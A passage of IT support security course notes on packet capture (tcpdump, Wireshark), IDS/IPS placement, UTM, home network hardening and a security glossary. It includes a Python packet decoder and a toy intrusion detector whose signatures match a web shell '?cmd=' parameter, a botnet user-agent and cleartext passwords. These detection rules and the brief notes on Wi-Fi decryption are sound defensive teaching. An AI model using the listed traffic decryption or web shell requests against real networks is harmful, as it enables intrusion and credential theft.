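    tcp = ip[ihl:total_len]                      # ignore any link-layer padding
    sport, dport, seq, ack, off_res, flags, win = struct.unpack("!HHIIBBH", tcp[:16])
    data_off = (off_res >> 4) * 4
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "flags": flag_str(flags), "seq": seq, "ack": ack, "win": win,
            "options": tcp[20:data_off], "payload": tcp[data_off:]}


def summary_line(frame: bytes, ts: datetime) -> str:
    """One line in the shape tcpdump -n prints."""
    p = decode_frame(frame)
    return (f"{ts:%H:%M:%S.%f} IP {p['src']}.{p['sport']} > {p['dst']}.{p['dport']}: "
            f"Flags [{p['flags']}], seq {p['seq']}, ack {p['ack']}, win {p['win']}, "
            f"length {len(p['payload'])}")


def hexdump(data: bytes, width: int = 16) -> str:
    """Same layout as tcpdump -X: offset, hex in 2-byte groups, ASCII."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hx = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"0x{off:04x}:  {hx:<39}  {asc}")
    return "\n".join(lines)


# Constructed sample: an HTTP request carrying a query parameter.
SAMPLE = build_frame("192.0.2.10", "198.51.100.7", 49152, 80, 1000, 2000, 0x18, 512,
                     b"GET /?q=wireshark HTTP/1.1\r\nHost: www.example.com\r\n\r\n")

if __name__ == "__main__":
    print(summary_line(SAMPLE, datetime.now()))
    print(hexdump(SAMPLE[14:]))  # -X dumps from the IP header; -XX would include Ethernet
```

Run it and compare the hex dump against the summary line: the quad sits at fixed offsets in the IP and TCP headers, the flags byte 0x18 decodes to `[P.]`, and the payload is simply everything after the TCP data offset, which is why the ASCII column makes an unencrypted HTTP request readable at a glance.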
Wireshark is another packet capture 
and analysis tool that you can use. 
But it's way more powerful when it comes to 
application and packet analysis compared to Tcpdump. 
It's a graphical utility that also uses 
the libpcap library for 
capture and interpretation of packets. 
But it's way more extensible when it 
comes to protocol and application analysis. 
While Tcpdump can do basic analysis of 
some types of traffic like DNS queries and answers, 
Wireshark can do way more. 
Wireshark can decode encrypted payloads if the encryption key is known.
It can identify and extract data payloads from file transfers through protocols like SMB or HTTP.
Wireshark's understanding of application-level protocols even extends to its filter strings.
This allows filter rules like finding HTTP requests with specific strings in the URL, which would look like http.request.uri matches "q=wireshark".
That filter string would locate packets in our capture that contain a URL request with the specified string within it.
In this case, it would match a query parameter from a URL searching for Wireshark.
While this could be done using tcpdump, it's much easier using Wireshark.
Let's take a quick look at the Wireshark interface, 
which is divided into thirds. 
The list of packets are up top, 
followed by the layered representation 
of a selected packet from the list. 
Lastly, the hex and ASCII representation of the selected packet is at the bottom.
The packet list view is color-coded to distinguish between different types of traffic in the capture.
The color coding is user configurable.
The defaults are green for TCP packets, light blue for UDP traffic, and dark blue for DNS traffic.
Black highlights problematic TCP packets, like out-of-order or retransmitted packets.
Above the packet list pane is 
a display filter box which allows 
complex filtration of packets to be shown. 
This is different from capture filters which follows 
the libpcap standard along with Tcpdump. 
Wireshark's deep understanding of protocols allows 
filtering by protocols along with their specific fields. 
There are over 2,000 protocols supported by Wireshark; we won't cover them in detail.
Not only does Wireshark have 
very handy protocol handling and filtration, 
it also understands and can 
follow TCP stream or sessions. 
This lets you quickly reassemble and 
view both sides of the TCP session 
so you can easily view 
the full two-way exchange of information between parties. 
Some other neat features of Wireshark are its ability to decrypt WEP-encrypted wireless packets if the key is known, and WPA/WPA2-PSK traffic if the passphrase is known; for WPA the capture must also include the client's four-way handshake, since the per-session keys are derived from it.
It's also able to view Bluetooth traffic with the right hardware, along with USB traffic and other protocols like Zigbee.
It also supports file carving, or extracting data payloads from files transferred over unencrypted protocols like HTTP file transfers or FTP.
It's able to extract audio streams from unencrypted VoIP traffic.
So basically, Wireshark is awesome.
You might be wondering how packet capture and 
analysis fits into security at this point. 
Like logs analysis, 
traffic analysis is also 
an important part of network security. 
Traffic analysis is done using 
packet captures and packet analysis. 
Traffic on a network is basically a flow of packets. 
Now being able to capture and 
inspect those packets is important 
to understanding what type of traffic is 
flowing on our networks that we'd like to protect.

Supplemental Reading for Promiscuous Mode


For more information on this Video Lecture check out the following links:

Enabling promiscuous mode on Mac OS X

Enabling promiscuous mode on Windows

Intrusion detection and prevention systems, or IDS/IPS, operate by monitoring network traffic and analyzing it.
As an IT support specialist, 
you may need to support 
the underlying platform that the IDS/IPS runs on. 
You might also need to maintain the system itself, 
ensuring that rules are updated 
and you may even need to respond to alerts. 
What exactly do IDS and IPS systems do? 
They look for matching behavior or 
characteristics that would indicate malicious traffic. 
The difference between an IDS and 
an IPS system is that IDS is only a detection system. 
It won't take action to block or 
prevent an attack when one is detected, 
it will only log and alert. 
But an IPS system can adjust firewall rules on 
the fly to block or drop 
the malicious traffic when it's detected. 
IPS and IDS systems can 
either be host-based or network-based. 
In the case of a network intrusion detection system 
or NIDS, 
the detection system would be 
deployed somewhere on a network 
where it can monitor traffic for 
a network segment or subnet. 
A host-based intrusion detection system 
would be a software 
deployed on a host that monitors 
traffic to and from that host only. 
It might also monitor 
system files for unauthorized changes. 
NIDS resemble firewalls in a lot of ways.
But a firewall is designed to prevent intrusions by blocking potentially malicious traffic coming from outside and to enforce ACLs between networks.
NIDS are meant to detect and alert on potentially malicious activity coming from within the network.
Plus, firewalls only have visibility of traffic flowing between the networks they're set up to protect; they generally wouldn't have visibility of traffic between hosts inside the network.
The location of the NIDS must be considered carefully when you deploy the system.
It needs to be located in the network topology in a way that gives it access to the traffic we'd like to monitor.
A good way to get access to network traffic is using the port mirroring functionality found in many enterprise switches.
This allows all packets on a port, a port range, or an entire VLAN to be mirrored to another port where our NIDS host would be connected.
With this configuration, our NIDS machine would be able to see all packets flowing in and out of hosts on the switch segment.
This lets us monitor host-to-host communications and traffic from hosts to external networks like the Internet.
Keep in mind that a mirror port can be oversubscribed: mirroring several busy ports or a whole VLAN onto one link can exceed that link's capacity, and the switch will silently drop the excess, so the NIDS won't see everything.
The NIDS host would analyze this traffic by enabling promiscuous mode on the analysis port, the network interface that's connected to the mirror port on the switch.
It can see all packets being passed and perform analysis on the traffic.
Since this interface is used for receiving mirrored packets from the network we'd like to monitor, a NIDS host must have at least two network interfaces: one for monitoring and analysis, and a separate one for connecting to our network for management and administrative purposes.
Placement of a NIPS, or network intrusion prevention system, would differ from a NIDS.
This is because a prevention system is able to take action against suspected malicious traffic.
In order for a NIPS device to block or drop traffic from a detected threat, it must be placed in line with the traffic being monitored.
This means that the traffic being monitored must pass through the NIPS device.
If that weren't the case, the NIPS host wouldn't be able to take action on the suspected traffic.
Think of it this way. 
A NIDS device is a passive observer that 
only watches the traffic and 
sends an alert if it sees something. 
This is unlike a NIPS device, 
which not only monitors traffic, 
but can take action on the traffic it's monitoring 
usually by blocking or dropping the traffic. 
The detection of threats or malicious traffic is usually handled through signature-based detection, similar to how antivirus software detects malware.
As an IT support specialist, you might be in charge of maintaining the IDS or IPS setup, which would include ensuring that rules and signatures are up to date.
Signatures are unique characteristics of known malicious traffic.
They might be specific sequences of packets, or packets with certain values encoded in a specific header field.
This allows intrusion detection and prevention systems to easily and quickly recognize known bad traffic from sources like botnets, worms, and other common attack vectors on the Internet.
But similar to antivirus, less common or targeted attacks might not be detected by a signature-based system, since there might not be signatures developed for these cases.
It's also possible to create custom rules to match traffic that might be considered suspicious but not necessarily malicious.
This would allow investigators to look into the traffic in more detail to determine how bad it actually is.
If the traffic is found to be malicious, a signature can be developed from the traffic and incorporated into the system.
What actually happens when a NIDS detects something malicious?
This is configurable, but usually the NIDS would log the detection event along with a full packet capture of the malicious traffic.
An alert would also usually be triggered to notify the investigating team to look into the detected traffic.
Depending on the severity of the event, the alert may just email a group or create a ticket to follow up on.
Or it might page someone in the middle of the night if it's determined to be really high severity and urgent.
These alerts would usually also include reference information linking to a known vulnerability or some more information about the nature of the alert to help the investigator look into the event.
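The following is an added example, not from the course and not Snort's or Suricata's code: a toy signature engine in the spirit of those tools, run over a few constructed packets. It shows the three ideas above in one loop: signatures for known bad traffic, a custom rule for merely suspicious traffic, severity-based alert routing, and the passive NIDS versus inline NIPS difference. The rule contents, hosts, reference string and severity-to-action mapping are all invented for illustration.

```python
# Added example (not from the course): a toy signature-based detector in the
# spirit of Snort/Suricata rules, run over constructed packets. The signatures,
# hosts and severity-to-action mapping are invented for illustration.
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes


@dataclass
class Signature:
    sid: int                      # rule id, like Snort's "sid:"
    msg: str
    content: bytes                # byte sequence that must appear in the payload
    dport: Optional[int] = None   # None = any destination port
    severity: str = "medium"      # low | medium | high
    reference: str = ""           # where an analyst can read more


@dataclass
class Alert:
    sid: int
    msg: str
    severity: str
    reference: str
    packet: Packet                # full packet kept for the investigator, like a pcap


# Constructed rule set: two "known bad" signatures and one custom rule for
# traffic that is suspicious but not necessarily malicious.
RULES = [
    Signature(1000001, "Constructed botnet beacon user-agent", b"User-Agent: BotX/1.0",
              dport=80, severity="high", reference="internal-advisory-example"),
    Signature(1000002, "Constructed web shell command parameter", b"?cmd=",
              dport=80, severity="high"),
    Signature(9000001, "Credential sent over cleartext HTTP", b"password=",
              dport=80, severity="medium"),
]

ACTIONS = {"low": "log", "medium": "ticket", "high": "page"}


def matches(sig: Signature, pkt: Packet) -> bool:
    return (sig.dport is None or sig.dport == pkt.dport) and sig.content in pkt.payload


def process(packets, rules, inline: bool = False) -> Tuple[List[Packet], List[Alert]]:
    """NIDS when inline=False: observe everything, forward everything.
    NIPS when inline=True: packets with a high-severity match are dropped."""
    forwarded, alerts = [], []
    for pkt in packets:
        hits = [Alert(s.sid, s.msg, s.severity, s.reference, pkt) for s in rules if matches(s, pkt)]
        alerts.extend(hits)
        if inline and any(a.severity == "high" for a in hits):
            continue  # drop: only possible because we sit in the traffic path
        forwarded.append(pkt)
    return forwarded, alerts


def route(alert: Alert) -> str:
    """What the alert triggers, by severity."""
    return ACTIONS[alert.severity]


# Constructed traffic: a normal request, a cleartext login, and a beacon.
TRAFFIC = [
    Packet("192.0.2.10", "198.51.100.7", 80, b"GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n"),
    Packet("192.0.2.11", "198.51.100.7", 80, b"POST /login HTTP/1.1\r\n\r\nuser=bob&password=hunter2"),
    Packet("192.0.2.12", "203.0.113.5", 80, b"GET /gate.php HTTP/1.1\r\nUser-Agent: BotX/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    fwd, alerts = process(TRAFFIC, RULES, inline=True)
    for a in alerts:
        print(f"[{a.severity}] sid:{a.sid} {a.msg} {a.packet.src} -> {a.packet.dst} => {route(a)}")
    print(f"forwarded {len(fwd)} of {len(TRAFFIC)} packets")
```

Running it with `inline=False` produces the same two alerts but forwards all three packets, which is exactly the passive-observer behaviour of a NIDS on a mirror port; only the inline deployment can drop the beacon. The medium-severity custom rule never blocks anything, it just creates a ticket for someone to look at.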
Well, we covered a lot of ground 
on securing your networks. 
I hope you feel secure enough to move on. 
If not, you can review any 
of these concepts that we've talked about.

Supplemental reading for Intrusion Detection/Prevention System
Snort: https://www.snort.org/

Suricata: https://suricata-ids.org/

The Bro Network Security Monitor has recently been renamed to the Zeek Network Security
Monitor: https://www.zeek.org/

Unified Threat Management (UTM)
Previously, you learned about several network security topics, including network hardening best practices,
firewall essentials, and the foundations of IEEE 802.1X. In this reading, you will learn about a robust
solution for network security, Unified Threat Management (UTM), along with its features, benefits, and
risks.

UTM solutions stretch beyond the traditional firewall to include an array of network security tools with a
single management interface. UTM simplifies the configuration and enforcement of security controls and
policies, saving time and resources. Security event logs and reporting are also centralized and simplified to
provide a holistic view of network security events.

UTM options and configurations

UTM solutions are available with a variety of options and configurations to meet the network security
needs of an organization:
UTM hardware and software options:

 Stand-alone UTM network appliance


 Set of UTM networked appliances or devices
 UTM server software application(s)
Extent of UTM protection options:

 Single host
 Entire network
UTM security service and tool options can include:

 Firewall: Can be the first line of defense in catching phishing attacks, spam, viruses, malware, and
other potential threats that attempt to access an organization’s network. Firewalls can be
hardware devices or software applications. Firewalls filter and inspect packets of data attempting
to enter and exit a managed network. Rules can be configured to permit or prevent certain types of
packets from entering the network. 
 Intrusion detection system (IDS): Passively monitors packets of data and network traffic for
unusual patterns that could indicate an attack. IDS devices can monitor entire networks (NIDS) or
just a single host (HIDS). IDS identifies, logs, and alerts IT Support about suspicious traffic.
However, IDS does not prevent an attack from occurring. This system gives IT Support
professionals the opportunity to inspect flagged events to determine how to handle the threat on a
case by case basis.   
 Intrusion prevention system (IPS): Actively monitors packets and network traffic for potential
malicious attacks. IPS systems can be configured to automatically block attacks or to allow
manual interventions. IPS devices can monitor entire networks (NIPS) or just a single host (HIPS).
 Antivirus software: Uses a signature database to obtain the profiles of malicious files, such as
spyware, Trojans, malware, worms, and more. The antivirus software monitors the organization’s
network and systems for these virus signatures. Once identified, the software will block,
quarantine, or destroy them.
 Anti-malware software: Scans information streams for known malicious malware signatures and
blocks threats. Additionally, anti-malware software can use heuristic analysis to detect novel
malware threats by identifying key behaviors and characteristics. The software can also use
sandboxing to isolate suspicious files. 
 Spam gateway: Filters, identifies, and quarantines spam email. Spam gateways are network
servers that use Domain Name System (DNS) based checks, such as sender blocklists and sender verification records, to protect against spam.
 Web and content filters: Block user access to risky and malicious websites. When a user attempts
to access an unauthorized or suspicious website using a browser, the UTM web filter can prevent
the website from loading. The filter can also be customized to block certain types of websites or
specific URLs, like social media or other websites that might be a distraction in the workplace. 
 Data leak/loss prevention (DLP): Monitors outgoing network traffic for personal, sensitive, and
confidential data. DLP includes a verification system to determine if the external data transfer is
authorized or malicious, and can block unauthorized attempts.  
 Virtual Private Network (VPN): Encrypts data and creates a private “tunnel” to safely transmit
the data through a public network.

Stream-based vs. proxy-based UTM inspections

UTM solutions offer two methods for inspecting packets in UTM firewalls, IPS, IDS, and VPNs:
 Stream-based inspection, also called flow-based inspection: UTM devices inspect data samples
from packets for malicious content and threats as the packets flow through the device in a stream
of data. This process minimizes the duration of the security inspection, which keeps network data
flowing at a faster rate than a proxy-based inspection.  
 Proxy-based inspection: A UTM network appliance works as a proxy server for the flow of network
traffic. The UTM appliance intercepts packets and uses them to reconstruct files. Then the UTM
device analyzes the file for threats before allowing the file to continue on to its intended
destination. Although this screening process is more thorough than the stream-based
inspection technique, proxy-based inspection is slower and adds latency to the transmission of data.

Benefits of using UTM

UTM solutions can offer multiple benefits to an organization:

 UTM can be cost-effective: Reduces the time and resources needed to manage multiple stand-
alone security tools. Purchasing a suite of integrated tools may also be less expensive than buying
each tool separately. 
 UTM is flexible and adaptable: Offers flexible solutions and options for security management.
The security services and tools in a UTM can be implemented in any combination that is
appropriate for each network environment.
 UTM offers integrated and centralized management: Consolidates multiple security tools into a
central management console. This simplifies monitoring and addressing security threats, as well
as streamlines the management of  updates to the UTM components. The central management
feature also helps IT Support staff identify and stop the full extent of an attack across an entire
network.

Risks of using UTM

 UTM can become a single point of failure in a network security attack: If an attack disables an
entire UTM solution, there would be no other backup security services or tools to stop that attack.
One of the core principles of information systems management is to design and implement
redundant, backup, and failover systems. When one element of an IT system is attacked or
experiences a failure, there should always be a backup or parallel system to replace it. 
 UTM might be a waste of resources for small businesses: Small businesses may not need a robust
security solution like UTM. The time and money needed to purchase, implement, and manage a
complex UTM system may not provide a significant return on security benefits for a smaller
network. Cybercriminals are more likely to attack larger targets.

Key takeaways

 Unified Threat Management (UTM) systems offer multiple options in a comprehensive suite of
network security tools. UTM solutions can be implemented as hardware and/or software and can
protect either a single host or an entire network. 
 UTM security services and tool options include firewalls, IDS, IPS, antivirus and anti-malware
software, spam gateways, web and content filters, data leak/loss prevention, and VPN services. 
 The benefits of using a UTM solution include having a cost-effective network security system that is
flexible and adaptable with a management console that is integrated and centralized. The risks of
using UTM include creating a single point of failure for a network security system and it might be
an unnecessary use of resources for small businesses.

Home Network Security
Employees who work from home use home networks to access company files and programs. Using home
networks creates security challenges for companies. Companies can provide employees guidance for
protecting their home networks from attacks. This reading will cover common attacks on home networks
and steps to make home networks more secure. 

Common security vulnerabilities


Home networks have vulnerabilities to various types of attacks. The most common security attacks on
home networks include:

 Meddler in the middle attacks allow a meddler to get between two communicating devices or
applications. The meddler then relays messages, impersonating the sender to the receiver and the
receiver to the sender, without either one knowing they are not communicating with the correct person,
device, or application. These attacks allow the meddler to obtain login credentials and other sensitive information. 
 Data Theft is when data within the network is stolen, copied, sent, or viewed by someone who
should not have access. 
 Ransomware uses malware to keep users from accessing important files on their network. Hackers
grant access to the files after receiving a ransom payment. 

Keeping home networks secure


To protect company data, employees working from home need to take steps to improve the security of
their home networks. Home networks can have added protection without expensive equipment or
software. 

Employees can take steps to keep home networks more secure: 

 Change the router's default administrator password and default network name (SSID), using the same password guidelines as your company. 
 Limit access to the home network by not sharing access credentials outside of trusted
individuals. 
 Create a guest network that allows guests to connect to the internet but not to your other devices.
 Turn on Wi-Fi encryption (WPA2 or newer) so that a password is required before a device can join the network. 
 Disable WPS, which as covered earlier is vulnerable to PIN brute forcing. 
 Turn on the router's firewall to prevent unwanted traffic from entering or leaving your wireless
network without your knowledge. Regularly update your router firmware.
 Update to the newest Wi-Fi security standard your router and devices support, which is the most secure option for home Wi-Fi.
Another security measure that a company can take is for employees to work over a virtual private network,
or VPN. Using a VPN creates an encrypted, secure internet connection through which employees can
access company data. 

Key takeaways
Home network security is vital to protect a company’s sensitive information when employees work from
home.

 Data theft, ransomware, and meddler in the middle are common attacks on home networks. 
 Employees working from home need to take steps to improve the security of their home networks.

Module 4 Glossary
New terms and their definitions: Course 5 Week 4
Activation threshold: Triggers a pre-configured action when it is reached and will typically
block the identified attack traffic for a specific amount of time

Analyzing logs: The practice of collecting logs from different network and sometimes client
devices on your network, then performing an automated analysis on them

CCMP (counter mode CBC-MAC protocol): A mode of operation for block ciphers that
allows for authenticated encryption

Correlation analysis: The process of taking log data from different systems, and matching
events across the systems

Dynamic ARP inspection (DAI): A feature on enterprise switches that validates ARP packets against
known IP-to-MAC bindings (typically from DHCP snooping) and drops forged ones, preventing ARP
spoofing and poisoning attacks

EAP-TLS: One of the more common and secure EAP methods

Extensible authentication protocol over LAN (EAPOL): A standard for carrying EAP authentication
traffic over a LAN, used by 802.1X

Fail2ban: A common open source flood guard protection tool

Flood guards: Provide protection against DoS or Denial of Service Attacks

Four-Way Handshake: It is designed to allow an AP to confirm that the client has the correct
pairwise master key in a WPA-PSK setup without disclosing the PMK
GTK (Group Temporal Key): A temporal key that is actually used to encrypt data, in this case
broadcast and multicast traffic shared by all clients of an AP

Hubs: Devices that serve as a central location through which data travels through; a quick
and dirty way of getting packets mirrored to your capture interface

Implicit deny: A network security concept where anything not explicitly permitted or allowed
should be denied 

Intrusion detection and intrusion prevention systems (IDS/IPS): Operate by monitoring
network traffic and analyzing it

IP source guard (IPSG): It can be enabled on enterprise switches along with DHCP snooping

Logs analysis systems: They are configured using user-defined rules to match interesting or
atypical log entries 

Monitor mode: It allows to scan across channels to see all wireless traffic being sent by APs
and clients

Network hardening: The process of securing a network by reducing its potential
vulnerabilities through configuration changes, and taking specific steps

Network separation (network segmentation): A good security principle for an IT support
specialist to implement. It permits more flexible management of the network, and provides
some security benefits. This is the concept of using VLANs to create virtual networks for
different device classes or types

Network software hardening: Includes things like firewalls, proxies, and VPNs

CTR (Counter mode): A block cipher mode of operation that turns a block cipher into a stream
cipher by using a random seed value (nonce) along with an incrementing counter to create a key
stream to encrypt data with

Packet sniffing (packet capture): the process of intercepting network packets in their
entirety for analysis

Pairwise Transient Key (PTK): It is generated using the PMK, AP nonce, Client nonce, AP
MAC address, and Client MAC address

PBKDF2 (Password Based Key Derivation Function 2): A function that derives a key from a
password by running HMAC over the password and a salt many times, making brute force
attacks more expensive; WPA2-PSK uses it to derive the PMK from the passphrase and SSID

PIN authentication method: It uses PINs that are eight-digits long, but the last digit is a
checksum that's computed from the first seven digits
Port mirroring: Allows the switch to take all packets from a specified port, port range, or the
entire VLAN and mirror the packets to a specified switch port

Post-fail analysis: Investigating how a compromise happened after the breach is detected

Pre-shared key: It's the Wi-Fi password you share with people when they come over and
want to use your wireless network

Promiscuous mode: A type of computer networking operational mode in which all network
data packets can be accessed and viewed by all network adapters operating in this mode

Proxy: Can be useful to protect client devices and their traffic. They also provide secure
remote access without using a VPN

Rainbow tables: A pre-computed table of all possible password values and their
corresponding hashes

Reverse proxy: A service that might appear to be a single server to external clients, but
actually represents many servers living behind it

Rogue DHCP server attack: An attacker can hand out DHCP leases with whatever
information they want by deploying a rogue DHCP server on your network, setting a gateway
address or DNS server, that's actually a machine within their control

Tcpdump: It's a super popular, lightweight command-line based utility that you can use to
capture and analyze packets

TKIP (Temporal Key Integrity Protocol): The encryption protocol introduced with WPA to address
the shortcomings of WEP security

VPNs: Commonly used to provide secure remote access, and link two networks securely

WEP (Wired Equivalent Privacy): First security protocol introduced for Wi-FI networks

Wireshark: It's another packet capture and analysis tool that you can use, but it's way more
powerful when it comes to application and packet analysis, compared to tcpdump

WPA (Wi-Fi protected access): Designed as a short-term replacement that would be
compatible with older WEP-enabled hardware with a simple firmware update

WPA2 Enterprise: WPA2 using 802.1X authentication to Wi-Fi networks instead of a pre-shared key

WPS (Wifi Protected Setup): It's a convenience feature designed to make it easier for clients
to join a WPA-PSK protected network

802.1X: The IEEE standard for encapsulating EAP, or Extensible Authentication Protocol,
traffic over IEEE 802 networks
802.1X with EAP-TLS: Offers arguably the best security available, assuming proper and
secure handling of the PKI aspects of it

Terms and their definitions from previous weeks


A

Access Control Entries: The individual access permissions per object that make up the ACL

Access Control List (ACL): It is a way of defining permissions or authorizations for objects

Accounting: Keeping records of what resources and services your users access or what they
did when they were using your systems

Advanced Encryption Standard (AES): The first and only public cipher that's approved for
use with top secret information by the United States National Security Agency

Adware: Software that displays advertisements and collects data

Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Attack: An actual attempt at causing harm to a system

Auditing: It involves reviewing records to ensure that nothing is out of the ordinary

Authentication server (AS): In Kerberos, the server that receives the client's initial request,
which includes the user ID of the authenticating user, and issues the Ticket Granting Ticket

Authentication: Proving that an entity is who it claims to be; also a crucial application for
cryptographic hash functions (for example in HMACs and password verification)

Authorization: It pertains to describing what the user account has access to or doesn't have
access to

Availability: Means that the information we have is readily accessible to those people that
should have it

Backdoor: A way to get into a system if the other methods to get in a system aren't allowed,
it's a secret entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do
something

Bind: The LDAP operation by which clients authenticate to the server

Biometric authentication: Authentication that uses Biometric data


Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a
fixed size, then encodes that entire block as one unit

Botnet: A collection of one or more Bots

Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker

Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access

CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing
certificates. It's a crucial component of the PKI system

Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with
others usually by shifting or rotating the alphabet, a set of numbers or characters

CBC-MAC (Cipher block chaining message authentication codes): A mechanism for
building MACs using block ciphers

Central repository: It is needed to securely store and index keys and a certificate
management system of some sort makes managing access to storage certificates and
issuance of certificates easier

Certificate fingerprints: These are just hash digests of the whole certificate, and aren't
actually fields in the certificate itself, but are computed by clients when validating or
inspecting certificates

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no
longer valid

Certificate Signature Algorithm: This field indicates what public key algorithm is used for
the public key and what hashing algorithm is used to sign the certificate

Certificate Signature Value: The digital signature data itself

Certificate-based authentication: It is the most secure option, but it requires more support
and management overhead since every client must have a certificate

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies

Client certificates: They operate very similarly to server certificates but are presented by
clients and allow servers to authenticate and verify clients

CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but
instead of using a hashing function to produce a digest, a symmetric cipher with a shared
keys used to encrypt the message and the resulting output is used as the MAC

Code signing certificates: It is used for signing executable programs and allows users of these
signed applications to verify the signatures and ensure that the application was not tampered
with

Confidentiality: Keeping things hidden

Counter-based tokens: They use a secret seed value along with the secret counter value
that's incremented every time a one-time password is generated on the device

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service

Cryptanalysis: Looking for hidden messages or trying to decipher coded message

Cryptographic hashing: It is distinctly different from encryption because cryptographic hash
functions should be one directional

Cryptography: The overarching discipline that covers the practice of coding and hiding
messages from third parties

Cryptology: The study of cryptography

Cryptosystem: A collection of algorithms for key generation and encryption and decryption
operations that comprise a cryptographic service

Data binding and sealing: It involves using the secret key to derive a unique key that's then
used for encryption of data

Data information tree: A structure where objects will have one parent and can have one or
more children that belong to the parent object

Decryption: The reverse process from encryption; taking the garbled output and
transforming it back into the readable plain text

Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server

DES (Data Encryption Standard): One of the earliest encryption standards

Deterministic: It means that the same input value should always return the same hash value

DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors

Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football

Distinguished name (DN): A unique identifier for each entry in the directory

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems

DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS
record that will point you to a compromised DNS server

DSA (Digital Signature Algorithm): It is another example of an asymmetric encryption
system, though it's used for signing and verifying data

ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively

Elliptic curve cryptography (ECC): A public key encryption system that uses the algebraic
structure of elliptic curves over finite fields to generate secure keys

Encapsulating security payload: It's a part of the IPsec suite of protocols, which
encapsulates IP packets, providing confidentiality, integrity, and authentication of the
packets

Encryption algorithm: The underlying logic or process that's used to convert the plaintext
into ciphertext

Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher),
so that you receive a garbled, unreadable message as the output (ciphertext)

End-entity (leaf certificate): A certificate that has no authority as a CA

Entropy pool: A source of random data to help seed random number generators

Evil twin: The premise of an evil twin attack is for you to connect to a network that is
identical to yours but that is controlled by an attacker. Once connected to it, they will be able
to monitor your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

Extensible Authentication Protocol (EAP): A standard authentication framework; EAP over
LAN, or EAPOL, is the encapsulation 802.1X uses to carry EAP frames directly over Ethernet
or Wi-Fi before the client has an IP address

FIPS (Federal Information Processing Standard): A series of standards published by NIST for
use by the United States federal government; DES was adopted as a FIPS (FIPS 46) for
encrypting and securing government data

Forward secrecy: This is a property of a cryptographic system so that even in the event that
the private key is compromised, the session keys are still safe

Frequency analysis: The practice of studying the frequency with which letters appear in
ciphertext

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods, because the TCP three-way handshakes they
start are left half open, tying up connection state on the server

Hash collisions: Two different inputs mapping to the same output

Hashing (Hash function): A type of function or operation that takes in an arbitrary data input
and maps it to an output of a fixed size, called a hash or a digest

HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function
along with a secret key to generate a MAC

HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the
communication your web browser has with the website is secured through encryption

Identification: The idea of describing an entity uniquely

Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Intermediary (subordinate) CA: It means that the entity that this certificate was issued to
can now sign other certificates

IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with
IPv6

Issuer Name: This field contains information about the authority that signed the certificate

Kerberos: A network authentication protocol that uses tickets to allow entities to prove their
identity over potentially insecure channels to provide mutual authentication

Kerckhoffs's principle: A principle that states that a cryptosystem, or a collection of
algorithms for key generation and encryption and decryption operations that comprise a
cryptographic service, should remain secure even if everything about the system is known
except for the key

Key length: It defines the maximum potential strength of the system

Key signing parties: Organized by people who are interested in establishing a web of trust,
and participants perform the same verification and signing

Key size: It is the total number of bits or data that comprises the encryption key

Key: A crucial component of a cipher, which introduces something unique into your cipher

Keylogger: A common type of spyware that's used to record every keystroke you make

L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs

Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for
accessing and maintaining directory services; the most popular open-source alternative to
the DAP

Logic bomb: A type of malware that's intentionally installed and lies dormant until a specific
event or time triggers its malicious action

MACs (Message Authentication Codes): A bit of information that allows authentication of a
received message, ensuring that the message came from the alleged sender and not a third
party masquerading as them

Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files

MD5: A popular and widely used hash function designed in the early 1990s as a
cryptographic hashing function; collisions are now trivial to produce, so it must not be used
where collision resistance matters

Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other

MIC (Message Integrity Check): It is essentially a hash digest of the message in question

Multifactor authentication (MFA): A system where users are authenticated by presenting
multiple pieces of information or objects

Network time protocol (NTP): A network protocol used to synchronize clocks, for example
between an authenticator token and the authentication server so that time-based OTPs match

NIST: National Institute of Standards and Technology

OAuth: An open standard that allows users to grant third-party websites and applications
access to their information without sharing account credentials

One-time password (OTP) tokens: Another very common method for handling multifactor
authentication

One-time password (OTP): A short-lived token, typically a number that's entered along with
a username and password

OpenID: An open standard that allows participating sites known as Relying Parties to allow
authentication of users utilizing a third party authentication service

Organizational units (OUs): Folders that let us group related objects into units like people or
groups to distinguish between individual user accounts and groups that accounts can belong
to

Password attacks: Utilize software like password crackers that try and guess your password

Password salt: Additional randomized data that's added into the hashing function to
generate the hash that's unique to the password and salt combination

PGP (Pretty Good Privacy) encryption: An encryption application that allows
